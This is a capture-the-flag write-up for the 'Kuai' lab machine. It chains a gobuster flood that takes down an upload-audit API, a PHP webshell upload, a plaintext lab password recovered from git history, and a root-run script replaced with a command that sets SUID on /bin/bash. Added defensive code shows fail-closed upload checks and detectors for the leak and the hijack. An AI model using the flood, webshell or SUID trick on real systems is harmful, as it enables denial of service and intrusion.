mazesec kuai

Information gathering

# Nmap 7.95 scan initiated Wed Dec 24 02:48:02 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 192.168.110.98
Nmap scan report for Kuai.lan (192.168.110.98)
Host is up (0.00046s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze\xE4\xB8\x8A\xE4\xBC\xA0
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    Werkzeug httpd 3.1.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.4 Python/3.9.2
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
MAC Address: 08:00:27:04:C1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 9.769 days (since Sun Dec 14 08:21:29 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 24 02:48:16 2025 -- 1 IP address (1 host up) scanned in 13.83 seconds

Port 80 is a file upload site (the escaped title bytes in the nmap output decode to "Maze上传", i.e. "Maze Upload"). Uploaded files end up under http://192.168.110.98/uploads/

  • Status: the upload is being sent to the audit server for review
  • Only JPG image files are allowed

http://192.168.110.98:3000/api is the API the upload site calls to audit each uploaded file.

Vulnerability analysis

Launch a DoS against http://192.168.110.98:3000/api so that it stops responding.

With the audit API down, the upload on port 80 fails open: the JPG-only rule is evidently enforced by the audit service rather than locally, so while the audit cannot answer a PHP file goes straight through.
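
The fail-open pattern described above, as an added example that is not the box's own upload code (which was not recovered): a minimal upload gate in the style of the port-80 app with a constructed stand-in for the :3000/api audit call, written once the way the box behaves (audit error = accept) and once fail-closed with local extension and magic-byte checks. The function names, the sample files and the simulated outage are assumptions.

```python
"""Fail-open vs fail-closed upload gate (added example, not the Kuai box's code).

The audit client, the audit outage and the sample files are constructed here;
the real box calls http://192.168.110.98:3000/api, which this code never touches.
"""
import posixpath
from typing import Callable, Dict, Tuple

ALLOWED_EXT = {"jpg", "jpeg"}
JPEG_MAGIC = b"\xff\xd8\xff"             # JPEG SOI marker followed by an APPn marker byte

AuditFn = Callable[[str, bytes], bool]   # (filename, content) -> approved?


class AuditUnavailable(Exception):
    """Raised when the audit API times out or refuses the connection."""


def make_audit(available: bool) -> AuditFn:
    """Constructed stand-in for the :3000/api call (assumption: it judges by name only).

    With available=False it behaves like a flooded Werkzeug dev server: every
    call fails. When available, it approves names ending in .jpg/.jpeg.
    """
    def audit(filename: str, content: bytes) -> bool:
        if not available:
            raise AuditUnavailable("audit API not responding")
        return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT
    return audit


def upload_fail_open(filename: str, content: bytes, audit: AuditFn) -> str:
    """The pattern the box exhibits: the remote audit is the only check, and an
    audit error is treated as 'nothing to object to'."""
    try:
        approved = audit(filename, content)
    except AuditUnavailable:
        approved = True                          # BUG: outage == approval
    return "accepted" if approved else "rejected"


def upload_fail_closed(filename: str, content: bytes, audit: AuditFn) -> str:
    """Hardened handler: local checks first, and an audit outage rejects."""
    base = posixpath.basename(filename)          # strip any directory component
    if "." not in base:
        return "rejected"
    ext = base.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXT:                   # .php, .phtml, .jpg.php ...
        return "rejected"
    if not content.startswith(JPEG_MAGIC):       # name says JPEG, bytes must agree
        return "rejected"
    try:
        approved = audit(base, content)
    except AuditUnavailable:
        return "rejected"                        # fail closed
    return "accepted" if approved else "rejected"


# Constructed sample uploads.
SAMPLES = {
    "photo.jpg": JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 16,
    "shell.php": b"<?php system($_GET['cmd']); ?>",
    "shell.jpg": b"<?php system($_GET['cmd']); ?>",   # JPG name, PHP bytes
}


def run_matrix() -> Dict[Tuple[str, bool, str], str]:
    """Verdict for every sample under both handlers, with the audit up and down."""
    results = {}
    for api_up in (True, False):
        audit = make_audit(api_up)
        for name, data in SAMPLES.items():
            results[(name, api_up, "fail_open")] = upload_fail_open(name, data, audit)
            results[(name, api_up, "fail_closed")] = upload_fail_closed(name, data, audit)
    return results


if __name__ == "__main__":
    for key, verdict in sorted(run_matrix().items()):
        print(key, verdict)
```

Compare the verdicts for shell.php with the audit up and down: the fail-open handler accepts it the moment the audit raises, which is exactly the state the flood on port 3000 produces. The fail-closed handler also stops shell.jpg, a PHP payload under a JPG name that a name-only audit approves even when it is up; whether the real audit inspects content is not shown on the page, so that part of the stand-in is an assumption.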

Exploitation

Leave this running in the background as the flood (rockyou is a password list, not a directory wordlist; it is used here purely for request volume, and 3000 threads is enough to keep the Werkzeug dev server on port 3000 from answering):

gobuster dir --url http://192.168.110.98:3000/ --threads 3000 --wordlist /usr/share/wordlists/rockyou.txt

While the audit API is unresponsive, upload a PHP webshell through port 80 and request it under /uploads/ to get a shell as www-data.

www-data@Kuai:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Dec 23 05:12 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  8 root root 4096 Dec 23 05:13 .git
-rw-r--r--  1 root root  308 Dec 23 05:12 app.py

Git leak

www-data@Kuai:/opt$ git log
fatal: detected dubious ownership in repository at '/opt'
To add an exception for this directory, call:

	git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
fatal: $HOME not set
www-data@Kuai:/opt$ export HOME=/tmp
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git show
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

diff --git a/app.py b/app.py
index 612613f..24b48b9 100644
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():
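
Review bot: masking the value in this hunk (`-// tuf: Cbr5Cq1QBS2GHUOGuJrc` becomes `+// tuf:********`) does not remove it; the parent commit still holds the plaintext, so `git show HEAD~1` or `git log -p` recovers it, and the credential has to be rotated (and the history rewritten) rather than overwritten. Separately, `//` is not a Python comment, so both the old and the new line are a SyntaxError in app.py; use `#`, or better, read the credential from the environment or a file outside the repository.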

That yields Cbr5Cq1QBS2GHUOGuJrc, which is tuf's password: log in as tuf (ssh or su) with it.
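
How to find this class of leak across a whole history rather than only in HEAD, as an added example that is not part of the writeup: a scanner for `git log -p` output that reports added lines shaped like key:value with a high-entropy value and flags the ones a newer commit merely masked. The log text is constructed to mirror the /opt repository (the parent commit hash and the remainder of app.py are invented), and no git command is executed.

```python
"""Scan `git log -p` output for credentials that were masked rather than removed
(added example, not from the Kuai writeup; the log below is constructed)."""
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import List

# Constructed `git log -p` text: HEAD masks the secret, the (invented) parent adds it.
SAMPLE_LOG = """\
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf
Author: Your Name <you@example.com>

    a

diff --git a/app.py b/app.py
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():

commit 1111111111111111111111111111111111111111
Author: Your Name <you@example.com>

    init

diff --git a/app.py b/app.py
--- /dev/null
+++ b/app.py
@@ -0,0 +1,8 @@
+from flask import Flask, jsonify
+
+app = Flask(__name__)
+// tuf: Cbr5Cq1QBS2GHUOGuJrc
+
+@app.route('/')
+def index():
+    return jsonify(ok=True)
"""

# key followed by ':' or '=' and a token of at least 16 "secret-looking" characters.
CRED_RE = re.compile(r"\b([A-Za-z_][\w.-]*)\s*[:=]\s*([A-Za-z0-9+/=_\-]{16,})")
MIN_ENTROPY = 3.0   # bits/char: "********" scores 0, a random 20-char token about 4


def shannon_entropy(s: str) -> float:
    """Bits per character; low for masked or repetitive strings."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


@dataclass
class Finding:
    commit: str
    path: str
    key: str
    token: str
    masked_later: bool   # a newer commit deleted this exact line, i.e. it was "fixed"


def scan_git_log(log: str) -> List[Finding]:
    """Walk `git log -p` output (newest commit first). Every '+' line that looks
    like key:secret is reported; if an older-in-the-walk (newer in time) commit
    removed the same line, the finding is marked masked_later."""
    findings: List[Finding] = []
    removed_in_newer = set()          # content of '-' lines seen in newer commits
    commit = path = ""
    in_hunk = False
    for raw in log.splitlines():
        if raw.startswith("commit "):
            commit, in_hunk = raw.split()[1], False
        elif raw.startswith("diff --git "):
            in_hunk = False
        elif raw.startswith("+++ ") and not in_hunk:
            path = raw[4:]
            if path.startswith("b/"):
                path = path[2:]
        elif raw.startswith("@@"):
            in_hunk = True
        elif in_hunk and raw.startswith("-"):
            removed_in_newer.add(raw[1:])
        elif in_hunk and raw.startswith("+"):
            content = raw[1:]
            m = CRED_RE.search(content)
            if m and shannon_entropy(m.group(2)) >= MIN_ENTROPY:
                findings.append(Finding(commit, path, m.group(1), m.group(2),
                                        content in removed_in_newer))
    return findings


if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_LOG):
        print(f"{f.commit[:12]} {f.path}: {f.key} -> {f.token} masked_later={f.masked_later}")
```

On the box the real input is `git log -p --all` run from /opt after the safe.directory step; `git show HEAD~1` prints the parent commit directly. The entropy threshold is what separates `********` from `Cbr5Cq1QBS2GHUOGuJrc`; tune MIN_ENTROPY and the token character class to the secret formats you expect.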

Privilege escalation

root executes a Python script that lives in tuf's home directory:

tuf@Kuai:~$ ps -ef
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py
nano a.py
# contents: import os;os.system('chmod 4777 /bin/bash')
rm app.py
mv a.py app.py

Removing and renaming instead of editing in place only needs write access to /home/tuf, whatever the ownership of app.py. Once root re-runs the replaced script, /bin/bash carries the SUID bit (confirm with ls -l /bin/bash), and /bin/bash -p gives a root shell.
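
Enumerating for this pattern on a fresh foothold, as an added example that is not from the writeup: parse `ps -ef`, pull the script out of interpreter invocations including the `/bin/sh -c python3 ...` form seen above, and report root-run scripts the current user could replace. The ps rows are constructed; the writable check is real and runs against a temporary directory the script creates, so the hit reproduces without the box.

```python
"""Flag root processes that execute a script the current user can replace
(added example, not from the Kuai writeup). ps rows are constructed; the
file-system check is real, against a temp directory this script creates."""
import os
import shlex
import shutil
import tempfile
from typing import List, Optional, Tuple

INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "php", "sh", "bash", "dash"}
SHELLS = {"sh", "bash", "dash"}


def script_path_from_args(args: str) -> Optional[str]:
    """Return the script argument of an interpreter command line.

    ps prints `sh -c "python3 /x/app.py"` as `/bin/sh -c python3 /x/app.py`, so a
    `-c` invocation is re-joined and parsed again as its own command line.
    """
    try:
        argv = shlex.split(args)
    except ValueError:
        return None
    if not argv:
        return None
    prog = os.path.basename(argv[0])
    if prog in SHELLS and len(argv) >= 3 and argv[1] == "-c":
        return script_path_from_args(" ".join(argv[2:]))
    if prog in INTERPRETERS:
        for a in argv[1:]:                 # first non-option argument is the script
            if not a.startswith("-"):
                return a
    return None


def parse_ps(lines: List[str]) -> List[Tuple[str, str]]:
    """(user, command line) pairs from `ps -ef` rows: UID PID PPID C STIME TTY TIME CMD."""
    rows = []
    for line in lines:
        parts = line.split(None, 7)
        if len(parts) == 8 and parts[1].isdigit():
            rows.append((parts[0], parts[7]))
    return rows


def replaceable_by_me(path: str) -> bool:
    """True if the file or its directory is writable: rm+mv, as in the writeup,
    only needs the directory, regardless of who owns the file."""
    return os.access(path, os.W_OK) or os.access(os.path.dirname(path) or ".", os.W_OK)


def find_hijackable(ps_lines: List[str]) -> List[str]:
    """Absolute script paths that root runs and the current user can replace."""
    hits = []
    for user, cmd in parse_ps(ps_lines):
        if user != "root":
            continue
        script = script_path_from_args(cmd)
        if script and os.path.isabs(script) and replaceable_by_me(script):
            hits.append(script)
    return hits


def demo() -> List[str]:
    """Constructed ps output pointing at a script in a directory we own."""
    tmp = tempfile.mkdtemp(prefix="kuai_")
    script = os.path.join(tmp, "app.py")
    with open(script, "w") as fh:
        fh.write("print('hello')\n")
    ps_lines = [
        "UID          PID    PPID  C STIME TTY          TIME CMD",
        "root           1       0  0 01:29 ?        00:00:01 /sbin/init",
        f"root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 {script}",
        "www-data     612     600  0 01:30 ?        00:00:00 /usr/sbin/apache2 -k start",
    ]
    try:
        return find_hijackable(ps_lines)
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for path in demo():
        print("root runs a script you can replace:", path)
```

Against a live host, feed it `ps -ef` output directly; a hit is only the start, since you still need to know how and when root re-executes the script (cron entry, systemd unit, a restarting parent), which `ps` alone does not tell you.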
